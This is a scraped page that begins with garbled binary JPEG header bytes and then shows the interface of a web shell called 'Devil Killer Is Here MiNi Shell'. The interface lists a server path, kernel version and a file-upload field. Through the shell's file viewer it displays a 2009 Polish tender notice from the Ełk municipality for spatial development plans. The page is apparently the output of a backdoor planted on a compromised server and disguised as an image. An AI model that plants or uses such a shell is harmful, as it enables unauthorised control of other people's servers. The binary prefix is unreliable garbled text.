JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090603/177312-N-2009.html

<p class="kh_header"><b>Ełk: Opracowanie planów miejscowych zagospodarowania przestrzennego i zmiana studium obrębów geodezyjnych:
CHRUŚCIELE, BARTOSZE, TALUSY, RĘKUSY, PISTKI</b><br>
<b>Numer ogłoszenia: 177312 - 2009; data zamieszczenia: 03.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Ełku , ul. Armii Krajowej 3, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6104437, faks 087 6103762.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.elk.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie planów miejscowych zagospodarowania przestrzennego i zmiana studium obrębów geodezyjnych:
CHRUŚCIELE, BARTOSZE, TALUSY, RĘKUSY, PISTKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE I
Przedmiotem zamówienia jest sporządzenie projektu miejscowego planu zagospodarowania przestrzennego dla terenu położonego w obrębie geodezyjnym nr 0053 TALUSY, Gmina Ełk, obejmującego grunty o nr ewid.2.10, 3.2, 3.3, 3.4, 38.6, 40.9, 46.5, 105, w obrębie geodezyjnym nr 0040 RĘKUSY, Gmina Ełk obejmującego grunty o nr ewid. 62, 63, 64, 65, 66, 67.4, 68.2, 69.2, w obrębie geodezyjnym nr 0034 PISTKI, obejmującego grunty o nr ewid. 95 i 101 zgodnie z obowiązującymi przepisami prawa, określonymi w szczególności w art. 15 ust. 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym oraz: projektu planu, opracowania ekofizjograficznego na potrzeby projektu planu, prognozy skutków finansowych uchwalenia planu i ideogramu sieciowego.
Projektowany obszar objęty planem wynosi ok. 308,00 ha.
Szczegółowy zakres czynności określa harmonogram rzeczowo-finansowy.
Opracowanie planu miejscowego winno nastąpić w oparciu o obowiązujące przepisy prawa, a w szczególności zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80 z dnia 10 maja 2003 r. poz. 717 z poźn. zm.), rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U. Nr 164  z dnia 19 września 2003 r. poz. 1587) i ustawą z dnia 27 kwietnia 2001 r.- Prawo ochrony środowiska (Dz.U. z 2008 r. Nr 25, poz. 150 tekst jednolity)
Zakres ustaleń planu winien spełniać co najmniej wymagania określone w art. 15 ust. 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80 z dnia 10 maja 2003 r. poz. 7171 z późn. zm.).
Wykonawca zamówienia zobowiązany jest do przygotowania projektów korespondencji, wykazów i innych dokumentów, których potrzeba wyłoni się w trakcie opracowania projektu planu miejscowego i przekazania ich Zamawiającemu.  
Wykonawca zamówienia odpowiedzialny jest za pozytywne uzgodnienie projektu planu przez właściwe organy, w zakresie wynikającym z rzetelności realizacji przedmiotu zamówienia.
W ramach wykonania usługi należy wykonać usługi należy wykonać:
-tekst planu-3 egz. w formie papierowej i 1 egz., na płycie CD,
-rysunek planu w wersji kolorowej- 3 egz. w formie  papierowej i 1 egz. na płycie CD,
-rysunek planu  w wersji czarno-białej- 2 egz. w formie papierowej, w tym 1 egz. w formacie A3.
d)   Zaleca się, aby oferent zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty i podpisania umowy.


Ustala się następujące etapy realizacji zamówienia:
Etap I- analiza wniosków do planu, sporządzenie wykazu i opracowanie propozycji ich rozpatrzenia.
Etap II- sporządzenie opracowań ekofizjograficznych na potrzeby projektu planu.
Etap III- sporządzenie koncepcji planu, zawierającego część tekstową i graficzną wraz z ideogramem sieci infrastruktury technicznej
Etap IV- sporządzenie projektu planu z prognozą oddziaływania na środowiskowo opiniowania przez komisję urbanistyczno-architektoniczną.
Etap V- sporządzenie projektu planu do uzgodnień i opiniowania przez właściwe organy, inne niż komisja urbanistyczno-architektoniczna 
Etap VI- wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i dokonanych uzgodnień
Etap VII- udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami
Etap VIII- analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem projektu planu wraz z prognozą oddziaływania na środowiska do publicznego wglądu. 
Etap IX- wprowadzenie zmian do projektu planu wynikających z rozpatrzenia uwag wniesionych do ustaleń projektu planu, w związku z wyłożeniem projektu planu wraz z prognozą oddziaływania na środowisko do publicznego wglądu
Etap X- w przypadku zaistnienia takiej potrzeby ewentualne przygotowanie projektu planu do opiniowania i uzgodnień przez stosowne organy 
Etap XI- wprowadzenie zmian do projektu planu wynikających z ponownych uzgodnień
Etap XII- przygotowanie projektu planu do uchwalenia 
Etap XIII- czynności wykonywane po uchwaleniu planu.



ZADANIE II
Przedmiotem zamówienia jest sporządzenie projektu miejscowego planu zagospodarowania przestrzennego dla terenu położonego w obrębie geodezyjnym nr 0003 BARTOSZE, Gmina Ełk, obejmującego działki o nr ewid.134 zgodnie z obowiązującymi przepisami prawa, określonymi w szczególności w art. 15 ust. 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym oraz: projektu planu, opracowania ekofizjograficznego na potrzeby projektu planu, prognozy skutków finansowych uchwalenia planu i ideogramu sieciowego.
Projektowany obszar objęty planem wynosi ok. 18,40 ha.
Szczegółowy zakres czynności określa harmonogram rzeczowo-finansowy.
Opracowanie planu miejscowego winno nastąpić w oparciu o obowiązujące przepisy prawa, a w szczególności zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80 z dnia 10 maja 2003 r. poz. 717 z poźn. zm.), rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U. Nr 164  z dnia 19 września 2003 r. poz. 1587) i ustawą z dnia 27 kwietnia 2001 r.- Prawo ochrony środowiska (Dz.U. z 2008 r. Nr 25, poz. 150 tekst jednolity)
Zakres ustaleń planu winien spełniać co najmniej wymagania określone w art. 15 ust. 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80 z dnia 10 maja 2003 r. poz. 7171 z późn. zm.).
Wykonawca zamówienia zobowiązany jest do przygotowania projektów korespondencji, wykazów i innych dokumentów, których potrzeba wyłoni się w trakcie opracowania projektu planu miejscowego i przekazania ich Zamawiającemu.  
Wykonawca zamówienia odpowiedzialny jest za pozytywne uzgodnienie projektu planu przez właściwe organy, w zakresie wynikającym z rzetelności realizacji przedmiotu zamówienia.
W ramach wykonania usługi należy wykonać usługi należy wykonać:
-tekst planu-3 egz. w formie papierowej i 1 egz., na płycie CD,
-rysunek planu w wersji kolorowej- 3 egz. w formie  papierowej i 1 egz. na płycie CD,
-rysunek planu  w wersji czarno-białej- 2 egz. w formie papierowej, w tym 1 egz. w formacie A3.
d)   Zaleca się, aby oferent zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty i podpisania umowy.


Ustala się następujące etapy realizacji zamówienia:
Etap I- analiza wniosków do planu, sporządzenie wykazu i opracowanie propozycji ich rozpatrzenia.
Etap II- sporządzenie opracowań ekofizjograficznych na potrzeby projektu planu.
Etap III- sporządzenie koncepcji planu, zawierającego część tekstową i graficzną wraz z ideogramem sieci infrastruktury technicznej
Etap IV- sporządzenie projektu planu z prognozą oddziaływania na środowiskowo opiniowania przez komisję urbanistyczno-architektoniczną.
Etap V- sporządzenie projektu planu do uzgodnień i opiniowania przez właściwe organy, inne niż komisja urbanistyczno-architektoniczna 
Etap VI- wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i dokonanych uzgodnień
Etap VII- udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami
Etap VIII- analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem projektu planu wraz z prognozą oddziaływania na środowiska do publicznego wglądu. 
Etap IX- wprowadzenie zmian do projektu planu wynikających z rozpatrzenia uwag wniesionych do ustaleń projektu planu, w związku z wyłożeniem projektu planu wraz z prognozą oddziaływania na środowisko do publicznego wglądu
Etap X- w przypadku zaistnienia takiej potrzeby ewentualne przygotowanie projektu planu do opiniowania i uzgodnień przez stosowne organy 
Etap XI- wprowadzenie zmian do projektu planu wynikających z ponownych uzgodnień
Etap XII- przygotowanie projektu planu do uchwalenia 
Etap XIII- czynności wykonywane po uchwaleniu planu.



ZADANIE III
. Przedmiotem zamówienia jest sporządzenie projektu miejscowego planu zagospodarowania przestrzennego dla terenu położonego w obrębie geodezyjnym nr 0003 BARTOSZE, Gmina Ełk, obejmującego działki o nr ewid.125.7 zgodnie z obowiązującymi przepisami prawa, określonymi w szczególności w art. 15 ust. 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym oraz: projektu planu, opracowania ekofizjograficznego na potrzeby projektu planu, prognozy skutków finansowych uchwalenia planu i ideogramu sieciowego.
Projektowany obszar objęty planem wynosi ok. 8,7220 ha.
Szczegółowy zakres czynności określa harmonogram rzeczowo-finansowy.
Opracowanie planu miejscowego winno nastąpić w oparciu o obowiązujące przepisy prawa, a w szczególności zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80 z dnia 10 maja 2003 r. poz. 717 z poźn. zm.), rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U. Nr 164  z dnia 19 września 2003 r. poz. 1587) i ustawą z dnia 27 kwietnia 2001 r.- Prawo ochrony środowiska (Dz.U. z 2008 r. Nr 25, poz. 150 tekst jednolity)
Zakres ustaleń planu winien spełniać co najmniej wymagania określone w art. 15 ust. 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80 z dnia 10 maja 2003 r. poz. 7171 z późn. zm.).
Wykonawca zamówienia zobowiązany jest do przygotowania projektów korespondencji, wykazów i innych dokumentów, których potrzeba wyłoni się w trakcie opracowania projektu planu miejscowego i przekazania ich Zamawiającemu.  
Wykonawca zamówienia odpowiedzialny jest za pozytywne uzgodnienie projektu planu przez właściwe organy, w zakresie wynikającym z rzetelności realizacji przedmiotu zamówienia.
W ramach wykonania usługi należy wykonać usługi należy wykonać:
-tekst planu-3 egz. w formie papierowej i 1 egz., na płycie CD,
-rysunek planu w wersji kolorowej- 3 egz. w formie  papierowej i 1 egz. na płycie CD,
-rysunek planu  w wersji czarno-białej- 2 egz. w formie papierowej, w tym 1 egz. w formacie A3.
d)   Zaleca się, aby oferent zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty i podpisania umowy.


Ustala się następujące etapy realizacji zamówienia:
Etap I- analiza wniosków do planu, sporządzenie wykazu i opracowanie propozycji ich rozpatrzenia.
Etap II- sporządzenie opracowań ekofizjograficznych na potrzeby projektu planu.
Etap III- sporządzenie koncepcji planu, zawierającego część tekstową i graficzną wraz z ideogramem sieci infrastruktury technicznej
Etap IV- sporządzenie projektu planu z prognozą oddziaływania na środowiskowo opiniowania przez komisję urbanistyczno-architektoniczną.
Etap V- sporządzenie projektu planu do uzgodnień i opiniowania przez właściwe organy, inne niż komisja urbanistyczno-architektoniczna 
Etap VI- wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i dokonanych uzgodnień
Etap VII- udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami
Etap VIII- analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem projektu planu wraz z prognozą oddziaływania na środowiska do publicznego wglądu. 
Etap IX- wprowadzenie zmian do projektu planu wynikających z rozpatrzenia uwag wniesionych do ustaleń projektu planu, w związku z wyłożeniem projektu planu wraz z prognozą oddziaływania na środowisko do publicznego wglądu
Etap X- w przypadku zaistnienia takiej potrzeby ewentualne przygotowanie projektu planu do opiniowania i uzgodnień przez stosowne organy 
Etap XI- wprowadzenie zmian do projektu planu wynikających z ponownych uzgodnień
Etap XII- przygotowanie projektu planu do uchwalenia 
Etap XIII- czynności wykonywane po uchwaleniu planu.









ZADANIE IV
Przedmiotem zamówienia jest sporządzenie projektu miejscowego planu zagospodarowania przestrzennego dla terenu położonego w obrębie geodezyjnym nr 0010 CHRUŚCIELE, Gmina Ełk, obejmującego działki o nr ewid.410 zgodnie z obowiązującymi przepisami prawa, określonymi w szczególności w art. 15 ust. 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym oraz: projektu planu, opracowania ekofizjograficznego na potrzeby projektu planu, prognozy skutków finansowych uchwalenia planu i ideogramu sieciowego.
Projektowany obszar objęty planem wynosi ok. 5,9200 ha.
Szczegółowy zakres czynności określa harmonogram rzeczowo-finansowy.
Opracowanie planu miejscowego winno nastąpić w oparciu o obowiązujące przepisy prawa, a w szczególności zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80 z dnia 10 maja 2003 r. poz. 717 z poźn. zm.), rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U. Nr 164  z dnia 19 września 2003 r. poz. 1587) i ustawą z dnia 27 kwietnia 2001 r.- Prawo ochrony środowiska (Dz.U. z 2008 r. Nr 25, poz. 150 tekst jednolity)
Zakres ustaleń planu winien spełniać co najmniej wymagania określone w art. 15 ust. 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80 z dnia 10 maja 2003 r. poz. 7171 z późn. zm.).
Wykonawca zamówienia zobowiązany jest do przygotowania projektów korespondencji, wykazów i innych dokumentów, których potrzeba wyłoni się w trakcie opracowania projektu planu miejscowego i przekazania ich Zamawiającemu.  
Wykonawca zamówienia odpowiedzialny jest za pozytywne uzgodnienie projektu planu przez właściwe organy, w zakresie wynikającym z rzetelności realizacji przedmiotu zamówienia.
W ramach wykonania usługi należy wykonać usługi należy wykonać:
-tekst planu-3 egz. w formie papierowej i 1 egz., na płycie CD,
-rysunek planu w wersji kolorowej- 3 egz. w formie  papierowej i 1 egz. na płycie CD,
-rysunek planu  w wersji czarno-białej- 2 egz. w formie papierowej, w tym 1 egz. w formacie A3.
d)   Zaleca się, aby oferent zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty i podpisania umowy.


Ustala się następujące etapy realizacji zamówienia:
Etap I- analiza wniosków do planu, sporządzenie wykazu i opracowanie propozycji ich rozpatrzenia.
Etap II- sporządzenie opracowań ekofizjograficznych na potrzeby projektu planu.
Etap III- sporządzenie koncepcji planu, zawierającego część tekstową i graficzną wraz z ideogramem sieci infrastruktury technicznej
Etap IV- sporządzenie projektu planu z prognozą oddziaływania na środowiskowo opiniowania przez komisję urbanistyczno-architektoniczną.
Etap V- sporządzenie projektu planu do uzgodnień i opiniowania przez właściwe organy, inne niż komisja urbanistyczno-architektoniczna 
Etap VI- wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i dokonanych uzgodnień
Etap VII- udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami
Etap VIII- analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem projektu planu wraz z prognozą oddziaływania na środowiska do publicznego wglądu. 
Etap IX- wprowadzenie zmian do projektu planu wynikających z rozpatrzenia uwag wniesionych do ustaleń projektu planu, w związku z wyłożeniem projektu planu wraz z prognozą oddziaływania na środowisko do publicznego wglądu
Etap X- w przypadku zaistnienia takiej potrzeby ewentualne przygotowanie projektu planu do opiniowania i uzgodnień przez stosowne organy 
Etap XI- wprowadzenie zmian do projektu planu wynikających z ponownych uzgodnień
Etap XII- przygotowanie projektu planu do uchwalenia 
Etap XIII- czynności wykonywane po uchwaleniu planu


ZADANIE V
Sporządzenie projektu zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Ełk, dla terenu położonego w obrębach geod.:  0010 Chruściele, 0003 Bartosze,,0053 Talusy, 0040 Rękusy,0034 Pistki, zgodnie z obowiązującymi przepisami prawa, określonymi w szczególności w art.10 ust. 1 i ust.2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym oraz: prognozy oddziaływania na środowisko projektu zmiany Studium  , określonym w załącznikach graficznych stanowiących integralną część uchwał otwierających prace planistyczne - uchwały w załączeniu do SIWZ.
Projektowany obszar objęty zmianą Studium wynosi ok. 341,042,0ha.
Sporządzenie opracowania ekofizjograficznego na potrzeby projektu zmiany Studium. Szczegółowy zakres czynności określa harmonogram rzeczowo-finansowy,. Opracowanie projektu zmiany Studium winno nastąpić w oparciu o obowiązujące przepisy prawa, a w szczególności zgodnie z ustawą z dnia 27 marca 2003r.o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 z dnia 10 maja 2003 r. poz. 717 z późn. zm.), rozporządzeniem Ministra Infrastruktury z dnia 26 kwietnia 2004r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. Nr 118 z 2004r. poz 1233) i ustawą z dnia 27 kwietnia 2001 roku - Prawo ochrony środowiska (Dz. U. z 2008r. Nr 25, poz. 150 tekst jednolity).
Zakres ustaleń zmiany studium winien spełniać co najmniej wymagania określone w art. 10 ust. 1 i 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 z dnia 10 maja 2003r. poz. 717 z późn. zm.).

Wykonawca dokona wizji lokalnej terenu celem uzyskania wszelkich danych, które mogą być niezbędne w przygotowaniu oferty i podpisania umowy na wykonanie zadania.
Forma opracowania:
Wykonawca zamówienia zobowiązany jest do sporządzenia jednolitego tekstu oraz rysunku Studium w skali 1:25 000, na podstawie materiałów dostarczonych przez Zamawiającego. Wykonawca zamówienia zobowiązany jest do przygotowania projektów korespondencji, wykazów i innych dokumentów, których potrzeba wyłoni się w trakcie opracowania projektu zmiany Studium  i przekazywania ich Zamawiającemu.
Wykonawca zamówienia jest odpowiedzialny jest za pozytywne uzgodnienie projektu zmiany Studium przez właściwe organy, w zakresie wynikającym z rzetelności realizacji przedmiotu zamówienia.
Zamawiający zastrzega sobie udział głównego projektanta w następujących spotkaniach i prezentacjach:
- prezentacja projektu zmiany Studium władzom Gminy,
- prezentacja projektu zmiany Studium na posiedzeniu komisji urbanistycznej,
- prezentacja projektu zmiany Studium podczas dyskusji publicznej.

W ramach wykonania usługi należy wykonać:
- jednolity kolorowy rysunek Studium w skali 1:25 000 - 1 egz.
- jednolity tekst Studium - 1 egz. 
- opracowanie ekofizjograficzne - 1 egz.


Zaleca się, aby oferent zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty i podpisania umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Warunki udziału w postępowaniu.

O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone   w art. 22 ust. 1 ustawy - Pzp, tj.:
1)	 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym                                     i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)	 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 Ustawy-Pzp.

2.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia.

1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
2)	W przypadku, o którym mowa w pkt. 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnik zwraca się do zamawiającego z wszelkimi sprawami i do niego zamawiający kieruje informacje, korespondencję itp.
3)	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, o których mowa w pkt. 1.  
4)	Jeżeli oferta wykonawców o których mowa w pkt. 1 została wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, dostarczenia umowy regulującej  współpracę tych wykonawców, która będzie zawierała co najmniej:
a) zobowiązanie do realizacji  wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia oraz ich solidarną odpowiedzialność za wykonanie zamówienia,
b)   określenie zakresu działania poszczególnych stron umowy,
c)  czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi.
Dokument należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
5)	Wykonawcy, o których mowa w pkt. 1 ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.



3.	Sposób dokonania oceny spełnienia warunków udziału w postępowaniu.

Ocena spełnienia warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez wykonawców dokumentów i oświadczeń, wymaganych w dziale 6 SIWZ - zgodnie z formułą spełnia - nie spełnia. Zamawiający w trakcie ww. oceny będzie brał pod uwagę jedynie dokumenty i oświadczenia, których wymagał w SIWZ na potwierdzenie spełniania postawionych warunków. W przypadku złożenia przez Wykonawcę oświadczenia lub dokumentu, zawierającego informację, że Wykonawca nie spełnia warunku udziału w postępowaniu lub nie złożenia przez Wykonawcę dokumentu potwierdzającego spełnianie warunku udziału w postępowaniu Zamawiający, z zastrzeżeniem art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych uzna, że Wykonawca warunku nie spełnia i wykluczy go z udziału w postępowaniu o czym zamawiający zawiadomi niezwłocznie wykluczonego wykonawcę podając uzasadnienie.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełniania warunków udziału w postępowaniu Wykonawcy są obowiązani przedłożyć:
